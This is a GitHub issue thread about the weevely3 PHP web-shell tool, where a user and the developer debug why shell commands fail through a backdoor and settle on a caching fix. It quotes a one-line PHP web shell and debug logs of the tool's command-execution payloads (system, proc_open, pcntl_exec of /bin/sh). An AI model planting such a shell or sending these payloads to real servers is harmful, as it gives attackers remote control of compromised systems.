### ISSUE TITLE
system shell interpreter is not available

### ISSUE THREAD

**Issue by brahmastra** [epinna/weevely3#8]
On server where working even <? $cmd =$ _POST["cmd"]; system($cmd); ?>  weevely3 not working.

The system shell interpreter is not available in this session.
PHP code and modules execution are available. Use the following
command replacements to simulate an unrestricted shell.

 zip, unzip                                 file_zip         
 touch                                      file_touch       
 gzip, gunzip                               file_gzip        
 curl                                       net_curl         
 nmap                                       net_scan         
 cd                                         file_cd          
 rm                                         file_rm          
 cat                                        file_read        
 vi, vim, emacs, nano, pico, gedit, kwrite  file_edit        
 wget                                       file_webdownload 
 find                                       file_find        
 tar                                        file_tar         
 ifconfig                                   net_ifconfig     
 bzip2, bunzip2                             file_bzip2       
 ls, dir                                    file_ls          
 grep                                       file_grep        

weevely> ls
40606
40606@40606:40606 PHP> ps
40606
40606@40606:40606 PHP> file_ls
40606

**Comment by epinna** [comment]
That's weird,

1. Delete the session file `_session/<host>/<sessname>.session` to clear the environment 
2. Restart weevely
3. Before to execute any command, type `:set debug True`
4. Execute a basic shell command e.g. `ls`
5. Past here or in my private email emilio.pinn*AT*gmail*DOT*com the output. Please before redact sensitive information if you don't want to share the web shell details.

**Comment by brahmastra** [comment]
weevely> :set debug True
debug = True
weevely> ls
[D][php] PHP setup failed 
[D][module] Module 'shell_php' is inactive, skipped
[!][terminal] Backdoor communication failed: please check URL reachability and password
weevely>

**Comment by epinna** [comment]
This is a different issue from the first comment: here the remote agent is not responding at all. As suggested, please check URL reachability and password.

**Comment by brahmastra** [comment]
yes, sorry.
This correct:
weevely> ls
[D][php] PHP setup running with StegaRef channel
[D][php] PAYLOAD @system('echo 25577');
[D][php] PAYLOAD @passthru('echo 25577');
[D][php] PAYLOAD print(@shell_exec('echo 25577'));
[D][php] PAYLOAD $r=array();@exec('echo 25577',$r);print(join("\n",$r));
[D][php] PAYLOAD  $h=@popen('echo 25577','r');if($h){while(!feof($h))echo(fread($h,4096));pclose($h);}
[D][php] PAYLOAD  $p=array(array('pipe','r'),array('pipe','w'),array('pipe','w'));$h=@proc_open('echo 25577',$p,$pipes);if($h&&$pipes){while(!feof($pipes[1]))echo(fread($pipes[1],4096));while(!feof($pipes[2]))echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}
[D][php] PAYLOAD @python_eval('import os; os.system('echo25577');');
[D][php] PAYLOAD  if(class_exists('Perl')){$perl=new Perl();$r=$perl->system('echo 25577');print($r);}
[D][php] PAYLOAD  $p=@pcntl_fork();if(!$p){@pcntl_exec("/bin/sh",Array("-c",'echo 25577'));}else{@pcntl_waitpid($p,$status);}

The system shell interpreter is not available in this session.
PHP code and modules execution are available. Use the following
command replacements to simulate an unrestricted shell.

 zip, unzip                                 file_zip         
 touch                                      file_touch       
 gzip, gunzip                               file_gzip        
 curl                                       net_curl         
 nmap                                       net_scan         
 cd                                         file_cd          
 rm                                         file_rm          
 cat                                        file_read        
 vi, vim, emacs, nano, pico, gedit, kwrite  file_edit        
 wget                                       file_webdownload 
 find                                       file_find        
 tar                                        file_tar         
 ifconfig                                   net_ifconfig     
 bzip2, bunzip2                             file_bzip2       
 ls, dir                                    file_ls          
 grep                                       file_grep        

weevely> ls
[D][php] PAYLOAD print(@gethostname());
[D][php] PAYLOAD  $u=@posix_getpwuid(@posix_geteuid());if($u){$u=$u['name'];}else{$u=getenv('username');}print($u);
[D][php] PAYLOAD @chdir('.')&&print(@getcwd());
[D][module] Shell interpreter unavailable, running the alias 'file_ls'
[D][php] PAYLOAD chdir('56135');$p=".";if(@is_dir($p)){$d=@opendir($p);$a=array();if($d){while(($f=@readdir($d)))$a[]=$f;sort($a);print(join(PHP_EOL,$a));}}
56135
56135@56135:56135 PHP>

**Comment by epinna** [comment]
Still no idea. Due to the debug setting you should find the already sent request and response data in `_weevely/weevely.log` in the format of

```
[D][php] PAYLOAD @system('echo 25577');
RESPONSE: .........
```

Please paste here this line and the lines below to see the server responses.

**Comment by brahmastra** [comment]
Log contain the same data.

**Comment by epinna** [comment]
I know, send me the data by email or just cut the interesting part (the serie of system-like calls and responses)

**Comment by brahmastra** [comment]
What is u email?
not all the same:

>>>> :set debug True
debug = True
>>>> ls
RESPONSE: '56135'
[D][php] PHP setup running with StegaRef channel
[D][php] PAYLOAD @system('echo 25577');
RESPONSE: '56135'
[D][php] PAYLOAD @passthru('echo 25577');
RESPONSE: '56135'
[D][php] PAYLOAD print(@shell_exec('echo 25577'));
RESPONSE: '56135'
[D][php] PAYLOAD $r=array();@exec('echo 25577',$r);print(join("\n",$r));
RESPONSE: '56135'
[D][php] PAYLOAD  $h=@popen('echo 25577','r');if($h){while(!feof($h))echo(fread($h,4096));pclose($h);}
RESPONSE: '56135'
[D][php] PAYLOAD  $p=array(array('pipe','r'),array('pipe','w'),array('pipe','w'));$h=@proc_open('echo 25577',$p,$pipes);if($h&&$pipes){while(!feof($pipes[1]))echo(fread($pipes[1],4096));while(!feof($pipes[2]))echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}
RESPONSE: '56135'
[D][php] PAYLOAD @python_eval('import os; os.system('echo25577');');
RESPONSE: '56135'
[D][php] PAYLOAD  if(class_exists('Perl')){$perl=new Perl();$r=$perl->system('echo 25577');print($r);}
RESPONSE: '56135'
[D][php] PAYLOAD  $p=@pcntl_fork();if(!$p){@pcntl_exec("/bin/sh",Array("-c",'echo 25577'));}else{@pcntl_waitpid($p,$status);}
RESPONSE: '56135'

weevely> ls
[D][php] PAYLOAD print(@gethostname());
RESPONSE: '56135'
[D][php] PAYLOAD  $u=@posix_getpwuid(@posix_geteuid());if($u){$u=$u['name'];}else{$u=getenv('username');}print($u);
RESPONSE: '56135'
[D][php] PAYLOAD @chdir('.')&&print(@getcwd());
RESPONSE: '56135'
[D][module] Shell interpreter unavailable, running the alias 'file_ls'
[D][php] PAYLOAD chdir('56135');$p=".";if(@is_dir($p)){$d=@opendir($p);$a=array();if($d){while(($f=@readdir($d)))$a[]=$f;sort($a);print(join(PHP_EOL,$a));}}
RESPONSE: '56135'
56135

**Comment by epinna** [comment]
Lol, it does not makes any sense, please send me all the portion of the log file, my email is emilio.pinn*AT*gmail*DOT*com

**Comment by epinna** [comment]
And also the PHP backdoor script, if possible.

**Comment by epinna** [comment]
Resolved with commit c14113837a2 and before. Now `core/config.py` contains `add_random_param_nocache` to force requested URL not to be cached by any proxy appending a random query string parameter.
